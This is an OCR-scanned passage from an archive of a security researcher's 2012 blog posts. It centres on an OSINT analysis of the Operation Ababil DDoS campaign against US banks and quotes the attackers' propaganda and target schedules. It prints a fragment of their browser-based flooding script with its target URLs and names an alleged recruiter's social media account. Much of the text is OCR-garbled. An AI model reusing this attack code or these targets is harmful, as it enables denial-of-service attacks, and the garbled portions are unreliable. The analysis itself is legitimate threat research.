reason (@.g. unexpected eof, timeout)") ee 
Http 
: —_— error :Htp_client.Bad_message(“Unknown 40.00 sec 170.201.60.3 PDhost 
reason (@.g. unexpected eof, timeout)") 
Haarlem, : — eee Tae 
Netherlands error :Htp_client.Bad_message(“Unknown 40.00 sec 170.201.60.3 Steadyhost 
reason (@.g. unexpected eof, timeout)") 
Http 
Minsk, Belarus = error:Http_client.Bad_message(“Unknown 40.00 sec 170.201.60.3 BellnfoNet Ltd 
reason (@.g. unexpected eof, timeout)") 
Http 
pratt error :Http_client.Bad_message (“Unknown 40,09 sec 170.201.60.3 Hostmaster, Ltd 
reason (@.g. unexpected eof, timeout)") 
: Http 
lai error:Http _client.Bad_message (“Unknown 40.00 sec 170.201.60.3 Joomla Hosting 
reason (@.g. unexpected eof, timeout") 
Dallas, TX, US Ok 254 21.12sec 0.01 170.201.60.3 © stom resin 
Toronto, ON Hap 
c A error :Http_client.Bad_message(“Unknown 40.00 sec 170,201.60,.3 OnyxNetUa 
reason (e.g. unexpected eof, timeout)") 


Is the Iranian government really behind this campaign, or was it actually the work of 
amateurs with outdated and virtually irrelevant technical skills? Taking into consideration the 
previous [9]DDoS campaign launched by Iranian hacktivists in 2009, in this very latest one we 
once again see a rather limited understanding of cyber operations taking into consideration 
the centralized nature of the chain of command in this group. 


What’s also worth pointing out is the fact that this is the first public appearance of the 
group that claims responsibility for these attacks. Considering this and the lack of a strong 
digital fingerprint for the group in question, virtually anyone on the Internet can [10]engineer 
cyber warfare tensions between Iran and the U.S, by basically impersonating a what’s 
believed to be an Iranian group. 


This post has been reproduced from [11]Dancho Danchev’s blog. Follow him 
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[12]Jon Twitter. 


1. http://www.zdnet .com/blog/security/attack-of-the-opt-in-botnets/6268 


2. http://www.reuters.com/article/2012/09/21/us-iran-cyberattacks-idUSBRE88K12H20120921 


8. 
1348697936/ 

9. bhttp://www.zdnet .com/blog/security/iranian-opposition-launches-organized-cyber-attack-against-pro-ahmadi 
10. http://www.zdnet .com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194 

11. 

12. 


8.9.2 Dissecting Operation Ababil’ - an OSINT Analysis (2012-09-28 00:25) 


Provoked by a questionable online video posted on YouTube, Muslims from the around the 
world united in an apparent [1lopt-in botnet crowdsourcing campaign aiming to launch a 
DDoS (denial of service attack) against YouTube for keeping the video online, and against 
several [2]major U.S banks and financial institutions. 


Dubbed "Operation Ababil", and operated by the Izz ad-Din al-Qassam a.k.a Qassam Cy- 
ber Fighters , the campaign appear to have had a limited, but highly visible impact on the 
targeted web sites. Just like in every other crowdsourced opt-in botnet campaign such as 
the "[3]Coordinated Russia vs Georgia cyber attack in progress", the "[4]lranian opposition 
launches organized cyber attack against pro-Ahmadinejad sites", the "[5]Electronic Jihad 
v3.0 - What Cyber Jihad Isn’t" campaign, and the "[6]The DDoS Attack Against CNN.com" 
campaign, political sentiments over the attribution element seem to have orbited around the 
notion that it was [7]nation-sponsored by the Iranian government. 


What’s so special about this attack? Did the individuals behind it poses sophisticated 
hacking or coding abilities? Was the work of hacktivists crowdsourcing bandwidth, or was it 
actually sponsored by the Iranian government? Can we even talk about attack attribution 
given that the group claiming responsibility for the attacks doesn’t have a strong digital 
fingerprint? 


In this post, I’ll perform an OSINT (open source intelligence) analysis aiming to expose 
one of the individuals part of the group that organized the campaign, spread their propaganda 
message to as many Muslim Facebook groups as possible, and actually claim responsibility for 
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the attacks once they took place. 


The campaign originally began with a message left on Pastebin.com by the Qassam Cy- 
ber Fighters group announcing "Operation Ababil": 


Operation Ababil, The second week 


In the previous announcements we stated that we will not tolerate insulting exalted character of the prophet of 
mercy and kindness. Due to the insult, we planned and accomplished a series of cyber operations against the 


insulting country's credit and financial centers. 


Some U.S. officials tried to divert people's attention from the subject and claimed that the main aim of the 
operation was not deal to insults but it had other intentions. The officials claimed that certain countries have 


taken these measures to solve their internal problems. 


We strongly reject the American officials’ insidious attempts to deceive public opinion. We declare that the 
kindness and love of Muslims and free-minded people of the world to the great prophet of Islam is much more than 
their violent anger be deflected and controlled by such deceptive tricks. 


Insult to a prophet is not acceptable especially when it is the Last prophet Muhammad (Peace Be upon Him). So as 


we promised before, the attack will be continued until the removal of that sacrilegious movie from the Internet. 


Therefore, we suggest a Timetable for this week attacks. Knowing which times the banks and other targets are out 
of service, the customers of targeted sites also can manage to do their jobs as well and have a rest while the 


specific organization is under attack. 


We shall attack for 8 hours daily, starting at 2:3@ PM GMT, every day. We repeat again the attacks will continue 


for sure till the removal of that sacrilegious movie. 


The original message left is as follows: 


"Operation Ababil, The second weekin the previous announcements we stated that we 
will not tolerate insulting exalted character of the prophet of mercy and kindness. Due to 
the insult, we planned and accomplished a series of cyber operations against the insulting 
country’s credit and financial centers.Some U.S. officials tried to divert people’s attention 
from the subject and claimed that the main aim of the operation was not deal to insults but it 
had other intentions. 


The officials claimed that certain countries have taken these measures to solve their in- 
4018 


ternal problems.We strongly reject the American officials’ insidious attempts to deceive public 
opinion. We declare that the kindness and love of Muslims and free-minded people of the 
world to the great prophet of Islam is much more than their violent anger be deflected and 
controlled by such deceptive tricks.Insult to a prophet is not acceptable especially when it is 
the Last prophet Muhammad (Peace Be upon Him). 


So as we promised before, the attack will be continued until the removal of that sacrile- 
gious movie from the Internet.Therefore, we suggest a Timetable for this week attacks. 
Knowing which times the banks and other targets are out of service, the customers of targeted 
sites also can manage to do their jobs as well and have a rest while the specific organization 
is under attack.We shall attack for 8 hours daily, starting at 2:30 PM GMT, every day. 


We repeat again the attacks will continue for sure till the removal of that sacrilegious 
movie.We invite all cyberspace workers to join us in this Proper Act. If America’s arro- 
gant government do not submit, the attack will be large and larger and will include other 
evil countries like Israel, French and U.Kingdom indeed.Tuesday 9/25/2012 : attack to 
Wells Fargo site, www.wellsfargo.comWednesday 9/26/2012 : attack to U.S. Bank site, 
www.usbank.comThursday 9/27/2012 : attack to PNC site, www.pnc.com Weekends: planning 
for the next week’ attacks.Mrt. Izz ad-Din al-Qassam Cyber Fighters" 


Periodically, the group also released update notes for the campaigns currently taking 
place: 
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«6 Operation Ababil : second step over chase.com | 
BY: QASSAMCYBERFIGHTERS ON SEP 19TH, 2012 | SYNTAX: NONE | SIZE: 0.47 KB | HITS: 2.874 
DOWNLOAD | RAW | EMBED | REPORT ABUSE 


“Operation Ababil” started over BoA : 


http: //pastebin.com/mCHia4éws 
http: //pastebin. com/wima9zyG 


In the second step we attacked the largest bank of the united states, the “chase” bank. These series of 
attacks will continue untill the Erasing of that nasty movie from the Internet. 


The site "www.chase.com” is down and also Online banking at “chaseonline.chase.com" is being decided to 
be Offline ! 


Down with modern infidels. 


### Cyber fighters of Izz ad-din Al qassam ### 


The original message published is as follows: 


"Operation Ababil" started over BoA :http://pastebin.com/mCHia4W5 
http://pastebin.com/wMma9zyGIn the second step we attacked the largest bank of the 
united states, the "chase" bank. These series of attacks will continue untill the Erasing of that 
nasty movie from the Internet.The site "www.chase.com" is down and also Online banking at 
"chaseonline.chase.com" is being decided to be Offline !Down with modern infidels. # # # 
Cyber fighters of Izz ad-din Al qassam # # #" 


Second statement released by the group: 
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«& Bank of America and New York Stock Exchange under attack unt | 
BY: QASSAMCYBERFIGHTERS ON SEP 18TH, 2012 | SYNTAX: NONE | SIZE: 1.08 KB | HITS: 7,579 | EXPIRES: NEVER 
DOWNLOAD | RAW | EMBED | REPORT ABUSE 

=| =| iG 


Dear Muslim youths, Muslims Nations and are noblemen 

When Arab nations rose against their corrupt regimes (those who support Zionist regime) at the other 
hand when, Crucify infidels are terrified and they are no more supporting human rights. United States of 
America with the help of Zionist Regime made a Sacrilegious movie insulting all the religions not only 
Islam. 

All the Muslims worldwide must unify and Stand against the action, Muslims must do whatever is necessary 
to stop spreading this movie. We will attack them for this insult with all we have. 

All the Muslim youths who are active in the Cyber world will attack to American and Zionist Web bases as 
much as needed such that they say that they are sorry about that insult. 

We, Cyber fighters of Izz ad-din Al qassam will attack the Bank of America and New York Stock Exchange 
for the first step. These Targets are properties of American-Zionist Capitalists. This attack will be 
started today at 2 pm. GMT. This attack will continue till the Erasing of that nasty movie. Beware this 
attack can vary in type. 


Down with modern infidels. 


The original message published is as follows: 


"Dear Muslim youths, Muslims Nations and are noblemenWhen Arab nations rose against their 
corrupt regimes (those who support Zionist regime) at the other hand when, Crucify infidels 
are terrified and they are no more supporting human rights. United States of America with the 
help of Zionist Regime made a Sacrilegious movie insulting all the religions not only Islam.All 
the Muslims worldwide must unify and Stand against the action, Muslims must do whatever is 
necessary to stop spreading this movie. 


We will attack them for this insult with all we have.All the Muslim youths who are active 
in the Cyber world will attack to American and Zionist Web bases as much as needed such 
that they say that they are sorry about that insult.We, Cyber fighters of Izz ad-din Al qassam 
will attack the Bank of America and New York Stock Exchange for the first step. These Targets 
are properties of American-Zionist Capitalists. This attack will be started today at 2 pm. GMT. 
This attack will continue till the Erasing of that nasty movie. Beware this attack can vary in 
type. Down with modern infidels." 


Clearly, the group behind the campaigns aimed to deliver concise propaganda to prospective 
Internet connected users who would later on be instructed on how to participate in the DDoS 
attacks. Let’s assess the potential of the distributed DDoS tool that was used in the campaign. 


Sample screenshot of the DDoS script in Arabic: 
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Start Attack 


Inside the .html file, we can see that there are only three web addresses that will be 
targeted in their campaign: 
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Sripue typo trruuer iu mes .ayeo vaiuc= i 


</div> 
<div> 
<d1> 
<label id="statuss"></label> 

<dd style="opacity: 0.5;display:none;" id="requestedctr"></dd> 

<dt style="opacity: 0.5; display:none; " >&nbsp;</dt> 

<dd style="opacity: 0.5; display:none; " id="succeededctr">0</dd> 

<dt style="opacity: 0.5; display:none; ">&nbsp; </dt> 

Jae style="opacity: 0.5;display:none;" id="fai ledctr">0</dd> 
< > 

</div> 
<script> 
var i=0; 


; 
targets.push( http:// www.nyse.com/ ); 
targets. push("“http:// www.nasdaq.com/"); 
targets. pushC"http: //www. BankofAmerica. com/ 


(function Q~) { 

var fireInterval; 

var isFiring = false; 

var requestedctrNode = document. getElementById("requestedctr"), 
succeededctrnode = document. getElementById("succeededctr"), 
failedctrNode = document. getElementById("failedctr"), 
targetURLNode = document. getElementById("targetuRL"), 
fireButton = document. getElementById("fireButton"), 
messageNode = nacregpesital packed scm aaa al 
rpsNode = document. getElementById("rps"), 
timeoutNode = document. getElementById("timeout"), 

statuss = document. getElementById("statuss"); 
var targetuRL = targetURLNode. value; 
TarqgetuRLNode. onchanae = function () { 


Detection rate for the DDoS script: 
youtube.html - [8]MD5: c3fd7601b4aefe70e4a8f6d73bf5c997 


Detected by 6 out of 43 antivirus scanners as HfTool-Loic; Hacktool.Generic; TRO} 
_GEN.F47V0924 


Originally, the attack relied on a static recruitment message which included links to the 
DIY DDOS script located on 4shared.com and Mediafire.com. What’s particularly interesting is 
the fact that the files were uploaded by a user going under the handle of "Marzi Mahdavi II". 
It’s important to point out that these static links were distributed as part of the recruitment 
campaign across multiple Muslim-friendly Facebook groups. 


Thanks to this fact, we could easily identify the user’s Facebook account, and actually 
spot the original message seeking participation in the upcoming attacks. 


Marzi Mahdavi II’s Facebook account: 
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Marzi Mahdavi ITI (.so.90 a.2,0) = Subscribe = Message 


@ Worked at ols) odor) Bod Sor eed 
@ Lives in Tehran, Iran 
@ From Tehran, Iran 


@ Female 
About Photos Map 
Do you know Marzi? Subscribe to Mars | 
Work and Education {s) Albums 


Opts ake, Qud Sp yu w 


Info 


Abou A ipa! & Lop czo Gin 
@ Lives in Tehran, Iran 
9 Female () Favorites See Al 


PU 
Mao ae’ aN 


Sample shared Wall post seeking participation in the upcoming DDoS campaign: 
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2 | Marzi Mahdavi II Timeline ~ Now ~ | 


2 aaS GSLy> yj Sad jl suilguo ly US gl 


+ oclaiw!l (jv5) 


pr Sls b&b aS lol ly Ul 9 9395 Slyreiawl 033489 [p19 U9) jl 1) V9 azo 
aiSao CuJled wy F9).5 aoliy Start Attack aoS» iS) 


Sample blog post enticing users to participate: 
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As Cyber fighters of Izz ad-din Al gassam asked, TRUEST TENT se) eS 
Qi'dah at 5 o’clock pm. Mecca time (14:00 GMT) Bank of America and New 


Just like Attack to YouTube site you can Download the Links and run the web 
page and simply hit the Start at the time of Attack. 


Marzi Mahdavi Il has once referenced a link pointing to the same blog, clearly indicating 
that he’s following the ongoing recruitment campaigns across multiple Web sites: 


Second blog post enticing users to participate in the DDoS campaign: 
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According to YouTube administrator refusal to remove the prophet of Islam- 
insulting video, an internet group has developed a computer program -— that is 
approved by Hilf-ol-Fozoul experts — to prevent the release of the video. 
When they run that program, YouTube will be impaired. 

For more influence of this action, it is necessary to run the program by a large 
number of users simultaneously. 

Tomorrow on 15 September at 4 pm. (Mecca Local Time) the action will begin. 
The considered file has been designed in html format. You can download it 
from links below: 

Link 1 


This very latest example of Iran’s hacktivist community understanding of the cyber oper- 
ations, once again lead me to the conclusion that what we’ve got here is either the fact that 
Iran’s hacktivist community is lacking behind with years compared to sophisticated Eastern 
European hacking teams and cybercrime-friendly communities, or that Iran is on purposely 
demonstrating low cyber operation capabilities in an attempt to trick the Western world into 
thinking that it’s still in a “catch up mode" with the rest of the world when it comes to offensive 
cyber operations. 


Did these coordinated DDoS campaigns actually had any impact on the targered web 
sites? According to data from the Host-Tracker, they seem to have achieved limited, but 
visible results, a rather surprising fact given the low profile DDoS script released by the 
Campaigners. 


Sample Host-Tracker report for a targeted web site during the campaign: 
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host-tracker.com '~ 


@ website monicring service 


FA UAT sw unbvart com0 Connection timed 
an’) 


Hep error Une ne_error(, 
——= Ser tart com 80 Carractan mes 


22.97 we 


2102 se 


22.00 sec 


MontGWcore 
vathentng 


970.295.206.083 


970, 835.206.1083 HOSTED 


TPO. EIS.206.183 Froreoy tet 


SPO. 235.206.1083 WS server ru 


U7O.ES.206. WE boris Howting 


37O.2.206.03 Seeadfoet 


STOLE 226. MOK Hosting 


POLIS OTL hewtrg 


S7O SFR 26S POrmet 


NordGete 


7027520683 is 


970.375.206.183 Oye e 


VOIB26.U er 


170, 295.206. 183_ -VOEH4 come 


7.235.206.1813 erroette 


270.235.206.81 powtfood 


270.E35206. Ud Cyter Sruke Let 


SPO SIB206.188 ASery ete 


VOIB26U Perce 


TO.135.206.18t AbCrerre 


270.2206. 82 Prerureeer 


Second Host-Tracker report for a targeted web site during the campaign: 
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host-tracker.com “/ 


website monitoring service 


http: .wellsfargo.co’ 
Se 


Skiecr be fr free emal aborts and ot aadiblty fer hatps/ /werw.wolisfargo.com 
Yt pas Geral lee 


Received resporees: 2 Ok 35 Fat Average: OA2sec 0.00 mr. 
1p ets 

Callas, TX, US error simp _clent Bad_message (Uninc OD ow 199.45.2.68 Provmoy Net 
reason (0.9 unexpected eof, teneout)") 


Cs) n 
Now York, ty, HostGW.com, 
yg STs. USA2 wee 39.45.2468 Wabhosting 


chet Bad _ creme Urine 
Feason (0.9 unexpected eof, trnecut)") 
rep 


Kev, Urraine error $p_chent Bad_messageClrinoer OD IRAS 2B HOSTLO 
reascn (0.9 Unexpected eof, trnecut)") 
Mirek, Gelirus error imp chert fad _rresnage Curing OM uw 399.45.66.303 betefotayt Les 
reascn, 
OW YS1.252.00.323 Stpactyhent 
area, error }Rp_chert Bad_meageCurinoen 2.00 wee 151.552.98.339 Upgradentry 
romen 
Aratoedam, = 
Hp chart Bad _maseage Urine 00 we 151.351.908.233 Fotos 
on, chert. Bad_meneageCUrinoen West Cost 
cA Us STO HRY, 2.00 we 151.151.98.133 hostrg 
Ug TOT Hp _chhenk Bad _mostageCUrinoen 4.00 wee BAS.248 CH Web Hosting 
Montreal, 
chert Bad message Curnow ” 
Quebec, Ca error Hep, : 2.00 we 199,.45.46,.201 ©P-Hontrg.com 
SPD, Russe error Hep _clert.fad_message(Urinoen 0.00 vec 199.45.66.201 Incihoet 
reason 


40.00 vec 151.151.988.133 Hostrwnter, Unt 


= error Hep _clert. Bad_messageCUrinoen 2.00 wc 199,45.46.301 Joomla Hosting 


Custom Hosting 


Dalles, TX, US error Hep_chent. Bad_message(Uninoen 40.00 we 151.151.98.133 
Soltions 


Dallas, TX, US error Hep_clhent Bad_messageCUrinoen 00 wc 199.45.46.301 Exthorting 
reason 
NETO error +p 40.00 sec 1S1.151.98.133 VPS-sorver.ru 


pone NordGate 


error Hp _chert. Bad_messageCurinoen 00 wc 199.45.66.201 ; 


Laneing, Ml evar Hp. 40.00 sec 151.151.88.133 Ricnerver 


Third Host-Tracker report for a targeted web site during the campaign: 
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host-tracker.com “»/ 
website monitoring service 


Subscribe for free email alerts and site availability 
type your@emad here 


reports for ay p://www.BankOfAmerica.com 


Add buttons to your sit 


tecaton meme Moment = 
Got butt 
Received responses: 14 Ok 32 Fail Average: 16.30sec 0.00 
Http Got bak 
Now York, fie error :Hittp_client.Bad_message(“Unknown 115.01 sec 171.199, 100.1 econ 
reason (@.g. unexpected eof, timeout)") febhosting 
Http 
ok: exror:Http_client.Bad_message(Urknown 40.00 sec 171.189.100.173 Nicosoft Media 
reason (6.9. unexpected eof, timeout)") 
Http 
—_ x @rror:‘Http_client.Bad_message(“Unknown 80.50 sec 171.161.148.173 Apto Hosting 
reason (@.g. unexpected eof, tirreout)") 
Http 
Dallas, TX, US error:Hitp_client.Bad_message("“Unkniown 80.50 sec 171.159,100.173 Provisoy.\et 
reason (6.g. unexpected eof, timeout)") 
Http 
Kiev, Ukraine error:Http_client.Bad_message("Uinknown 80.51 sec 171.199.100.173 HOSTED 
reason (€.g. unexpected eof, timeout)") civ 
Http 
catia @rror:Http_client. Bad_message(“Unknown 40.00 sec 171.199.100.173 Joomla Hosting 
reason (6.9. unexpected eof, tirmeout)") 
Http 
Dallas, TX, US error:Http_client.Bad_message(Urknown 40.00 sec 171.199.100.173 2m Nesting 
reason (€.g. unexpected eof, timeout)") a 
Http 
Lansing, Ml error:Http_cllent.Bad_message("Urknown 40.00 sec 171.161.148.173 Rioserver 
reason (@.g. unexpected eof, timeout") 
lar ok © 65.22 sec 0.00 171.159.228.173 Phil-Hosting.com 
Http 
Paris, France error:Http_client.Bad_message("Unknown 40.00 sec 171.161.148.173 Cyber Snake Ltd 
reason (@.g. unexpected eof, tirmeout)") 


Fourth Host-Tracker report for a targeted web site during the campaign: 
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host-tracker.com  *’ 


website monitoring service 


Subscribe for free email alerts and site availability re 
type your@email here 


Received responses: 39 Ok 8 Fail 
Atlanta, GA, US Http error :303 
Lansing, MI, US Http error :303 
Orlando, FL, US Http error :303 

London, UK Http error :303 
Kansas City, MO, US Http error :303 


Frankfurt, Germany Ok 
Dallas, TX, US Http error :303 
Minsk, Belarus Ok 


Los Angeles, CA, US Http error :303 
Paris, France Http error:303 


Dallas, TX, US Ok 
Washington, USA Ok 
Montreal, Quebec, Ca Ok 
Moscow. Russia Ok 


Average: 


154494 
179298 


0.88 sec 
0.09 sec 
0.07 sec 
0.06 sec 
0.05 sec 
0.08 sec 
0.48 sec 
1.29 sec 
0.68 sec 
0.10 sec 
0.11 sec 
0.44 sec 
0.38 sec 
2.43 sec 
0.67 sec 


183.18 
74.125.227.1 Rioserver 
173.194.37.4 Apto Hosting 

74.125.225.68 Admo.net LLC 

343.63 173.194.70.190 mrhost.biz 

227.44 = 173.194.32.36 BellnfoNet Ltd. 
173.194.33.2 PremiumReseller 

342.61 74.125.227.105 Custom Hosting Solutions 

413.41 74.125.228.66 Nidohosting 

62.20 173.194.43.2 NordGate networks 


261.83 173.194.32.200 JustHost 


Fifth Host-Tracker report for a targeted web site during the campaign: 
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English French Pycossi Spanish Main page Speedtest *'® Prices Sign up Login 


host-tracker.com  *e’ 


website monitoring service 


Thursday, September 27, 2012 5:09:35 PM 
Pt flin| 
t toh tn thinchadk ned 


Subscribe for free email alerts and site availability reports for http:// www.pne.com 


type your@emadl here 


Received responses: 22 Ok 14 Fail Average: 5.32sec 0.02 
Yor! Http . 
New Ha error :Htp_client.Bad_message(“Unknown 115.01 sec 170.201.60.3 pee 
reason (@.g. unexpected eof, timeout)") Le 
Amsterdam, — 
Nether! is error :Htp_client.Bad_message(“Unknown 40.00 sec 170.201.60.3 PDhost 
reason (@.g. unexpected eof, timeout)") 
Haarlem, sa. 
Nether! 1c error :Htp_client.Bad_message(“Unknown 40.00 sec 170.201.60.3 Steadyhost 
reason (@.g. unexpected eof, timeout)") 
Http 
Minsk, Belarus = error :Http_client.Bad_message(“Unknown 40.00 sec 170.201.60.3 BellnfoNet Ltd. 
reason (@.g. unexpected eof, timeout)") 
Amsterdam, —_ 
Neterlande error :Http_client.Bad_message(“Unknown 40,09 sec 170.201.60.3 Hostmaster, Ltd 
reason (@.g. unexpected eof, timeout)") 
Birmingham, _ 
UK error :Http_client.Bad_message(“Unknown 40.00 sec 170.201.60.3 Joomla Hosting 
reason (@.g. unexpected eof, timeout)") 
Dallas, TX, US Ok 254 2112sec 0.01 170.201.60.3 eae testa 
Toronto, ON Hap 
’ CA error :Http_client.Bad_message(“Unknown 40,00 sec 170,201.60.3 OnyxNetUa 
reason (€.g. unexpected eof, timeout)") 


Is the Iranian government really behind this campaign, or was it 
actually the work of amateurs with outdated and virtually irrelevant 


technical skills? Taking into consideration the previous [9]DDoS campaign launched by Iranian 
hacktivists in 2009, in this very latest one we once again see a rather limited understanding 
of cyber operations taking into consideration the centralized nature of the chain of command 


in this group. 


What’s also worth pointing out is the fact that this is the first public appearance of the 


group that claims responsibility for these attacks. Considering this and the lack of a strong 
digital fingerprint for the group in question, virtually anyone on the Internet can [10]engineer 
cyber warfare tensions between Iran and the U.S, by basically impersonating a what’s 
believed to be an Iranian group. 


This post has been reproduced from [11]Dancho Danchev’s blog. Follow him 


[12]Jon Twitter. 


1. http://www.zdnet .com/blog/security/attack-of-the-opt-in-botnets/6268 


2. http://www.reuters.com/article/2012/09/21/us-iran-cyberattacks-idUSBRE88K12H20120921 


8. https://www.virustotal.com/file/a3be8deb4ebc8de1d0d19467da606033c8938cf74d1489761fbc9e195d7d1c75/analysis/ 


1348697936/ 


9. http://www.zdnet .com/blog/security/iranian-opposition-launches-organized-cyber-attack-against-pro-ahmadin 


ejad-sites/361 


10. http://www.zdnet .com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194 


11. http://ddanchev.blogspot.com/ 
12. http://twitter .com/danchodanche 


8.9.3 Summarizing ZDNet’s Zero Day Posts for August (2012-09-28 01:43) 


ZDNet / Blog 


Zero Day 


Follow via: )\ 


The best of ZDNet, delivered 


ZDNet Newsletters 
Get the best of ZDNet delivered straight to 
your inbox 


Ryan Naraine 


Ryan Naraine is a 
journalist and social 
media enthusiast 
Specializing in 
Internet and 
computer security 


issues. 


Dancho Danchev 


Dancho Danchev is an 
independent seamtty 
consultant and cyber 
threats analyst, with 
extensive expenence 


in open source 


Latest Posts 


Adobe code signing infrastructure hacked by 
‘sophisticated threat actors’ 
The eyebrow-rassing hack effectively gave the attackers the 
1) Adobe abilty to create malware masquerading as legammate Adobe 
software and signals a raising of the stakes mn the world of 
Advanced Persistert Threats (APTs). 


Ryan Neraine 


Comments Vote 


Security conference Hack in The Box celebrates its tenth 

year in Malaysia 

pi oot It's been ten years since Hack in The Box SecConf broke 
ground m Malaysia. HiTS celebrates its birthday next month 
in Kuala Lumpur with an excting lineup. 


¥ ZDNet Must Read News Alerts - US: 
Major news is breaking. Are you ready? 
This newsletter has only the most 
important tech news nothing else 


Hi DwNed 


Top Stories 


Most Discussed 


Mobile Pwn20Own: iPhone 45 hacked by 
Dutch team 


4033 


The following is a brief summary of all of my posts at [1]ZDNet’s Zero Day for August, 2012. 
You can subscribe to [2]Zero Day’s main feed , or follow me on Twitter: 


01. [3]BlackBerry users targeted with malware-serving email campaign 

02. [4]Java zero day vulnerability actively used in targeted attacks 

03. [5]Loozfon Android malware targets Japanese female users 

04. [6]Researcher reports a CSRF vulnerability in Facebook’s App Center, earns $5,000 


05. [7]Cybercriminals impersonate popular security vendors, serve malware 


This post has been reproduced from [8]Dancho Danchev’s blog. Follow him 
[9]Jon Twitter. 


1. http: //zdnet.com/blog/securit 
2. http: //feeds.feedburner.com/zdnet/securit 


ttp://www.zdnet .com/blackberry-users-targeted-with-malware-serving-email-campaign-7000003154/ 


. http: //www.zdnet .com/java-zero-day-vulnerability-actively-used-in-targeted-attacks-7000003233/ 


ttp://www.zdnet .com/loozfon-android-malware-targets- japanese-female-users-7000003236/ 


. http://www.zdnet.com/researcher-reports-a-csrf-vulnerability-in-facebooks-app-center-earns-5000-700000324 


http: //www.zdnet .com/cybercriminals-impersonate-popular-security-vendors-serve-malware-7000003433/ 


. http://ddanchev. blogspot .com/ 
. http: //twitter.com/danchodanche 
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8.9.4 Summarizing Webroot’s Threat Blog Posts for August (2012-09-28 01:54) 


threat blog 


Home About the Bloggers Webroot.com RSS Feed 


e ° . - Archives 

From Russia with iPhone selling ee : 

affiliate networks 

September 27, 201 »-00 an Referral Program 

WOW WOW o 2 Vote ik about a win wir 
Free security for your 

By Dancho Danchev friends AND a donation 
to charity 

With affiliate networks itinuing to represent among the few key growth factors of the cybercrime 

osystem, it sh in’t be surprising that cybercrmina ntinue introducing new services ar ; 4 
with questionable quakty and sometmes unknown onge m the market, with the idea to entice Free tools 
potential network participants into monetizing the traffic they an. deliver through Diack hat SE Haven't tned Webroot 
arch &f ane puimizator maiverttsing, ang span ampaign ecureAnywhwere to 

remove an infecton? 

In this post, I'll profile a rec 4 yunched affillate network se j Phones that primarily target Download a free trial 

network's participants Webroot 


yoere 
rogram, Mmaiware 
Read More » eS 
Open a support ticket 
Tell your friends: Wi Facebook s [J twiter GI} Dicg <3 Redcat ©) StumbleUpon =) Email ncemed about a 
specific URL or IP? 
Check the reputation of 


Like this: Like Be thef 
a URL or IP address 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for August, 
2012. You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 


x 


01. [3]Spamvertised AICPA themed emails lead to Black Hole exploit kit 

02. [4]Spamvertised ‘PayPal has sent you a bank transfer’ themed emails lead to Black Hole 
exploit kit 

03. [5]Ongoing spam campaign impersonates LinkedIn, serves exploits and malware 

04. [6]Millions of spoamvertised emails lead to W32/Casonline 

05. [7]Cybercriminals impersonate AT &T’s Billing Service, serve exploits and malware 

06. [8]JIRS themed spam campaign leads to Black Hole exploit kit 

07. [9]Cybercriminals soamvertise bogus greeting cards, serve exploits and malware 

08. [10]Spamvertised ‘Federal Tax Payment Rejected’ themed emails lead to Black Hole 
exploit kit 

09. [11]Spamvertised ‘Fwd: Scan from a Hewlett-Packard Scanjet’ emails lead to Black Hole 
exploit kit 

10. [12]Spamvertised ‘Royal Mail Shipping Advisory’ themed emails serve malware 

11. [13]Cybercriminals impersonate Intuit Market, mass mail millions of exploits and malware 
serving emails 

12. [14]Cybercriminals spamvertise PayPay themed ‘Notification of payment received’ emails, 


4035 


serve malware 
13. [15]Cybercriminals impersonate UPS, serve malware 


This post has been reproduced from [16]Dancho Danchev’s blog. Follow him 
[17]on Twitter. 


1. http: //blog.webroot.com/ 
2. http: //feeds2.feedburner .com/WebrootThreatBlog 
3 


ttp://blog.webroot .com/2012/08/01/spamvertised-aicpa-themed-emails-lead-to-black-hole-exploit-kit/ 


4. http: //blog. webroot .com/2012/08/02/spamvertised-paypal-has-sent-you-a-bank-transfer-themed-emails-lead-to 


black-hole-exploit-kit/ 


5. http://blog.webroot .com/2012/08/08/ongoing-spam- campaign- impersonates-linkedin-serves-exploits-and-malwa: 


11. http://blog.webroot.com/2012/08/27/spamvertised-fwd-scan-from-a-hewlett-packard-scanjet-emails-lead-to- 
12. http://blog.webroot .com/2012/08/28/spamvert ised-royal-mail-shipping-advisory-themed-emails-serve-malwa 
13. http://blog. webroot .com/2012/08/29/cybercriminals- impersonate-intuit-market-mass-mail-millions-of-explo 
14. 

eived-emails-serve-malware/ 

15. 
16. 

17 
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ttp://blog.webroot . com/2012/08/30/cybercriminals-spamvertise-paypay-themed-notification-of-payment-rec 


8.10 October 


8.10.1 Summarizing Webroot’s Threat Blog Posts for September (2012-10-01 14:18) 


threat blog 


Home About the Bloggers Webroot.com RSS Feed 


New Russian DIY DDoS bot spotted in ses = 
the wild 


September 28, 2012 - 12:00 am Referral Program 


Week O 4 Votes Talk about a win win. 
Free security for your 

By Dancho Danchev friends AND a donation 
to charity 


Over the last couple of years, the modular and open source nature of today’s modern DDoS 

(distributed denial of service) bots inevitably resulted in the nse of the DDOS for hire and DDoS 

extortion monetization schemes within the cybercnme ecosystem. Free tools 

Haven't tied Webroot 
SecureAnywhwere to 
remove an infection? 
Download a free trial 


Webroot 
SecureAnywhere 
program/malware 
assistance? 

These maturing business models require constant mnovation on behalf of the cybercnminals providing Open a support ticket 
the easy to use and manage DIY DDoS bots, the foundation of these business models. What are some 

of the latest developments in this field? Are the malware co releases actually Concerned about a 
mnovating, or are they basically re-branding old malware bots and reintroducing them on the market? specific URL or IP? 

Let’s find out. Check the reputation of 
@ URL or IP address 


In this post, I'l profile a recently released DIY DDoS bot, which according to its author is a modification 
of the Dirt Jumper DDoS bot 


The following is a brief summary of all of my posts at [1]Webroot’s Threat Blog for September, 
2012. You can subscribe to my [2]Webroot’s Threat Blog RSS Feed 


or follow me on Twitter: 


x 


01. [3]Spamvertised ‘Wire Transfer Confirmation’ themed emails lead to Black Hole exploit kit 
02. [4]Intuit themed ‘QuickBooks Update: Urgent’ emails lead to Black Hole exploit kit 


03. [5]Cybercriminals resume spamvertising bogus greeeting cards, serve exploits and 
malware 


04. [6]Cybercriminals abuse Skype’s SMS sending feature, release DIY SMS flooders 
05. [7]New Russian service sells access to thousands of automatically registered accounts 
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06. [8]Spamvertised ‘Your Fedex invoice is ready to be paid now’ themed emails lead to Black 
Hole Exploit kit 


07. [9]New Russian DIY SMS flooder using ICQ’s SMS sending feature spotted in the wild 


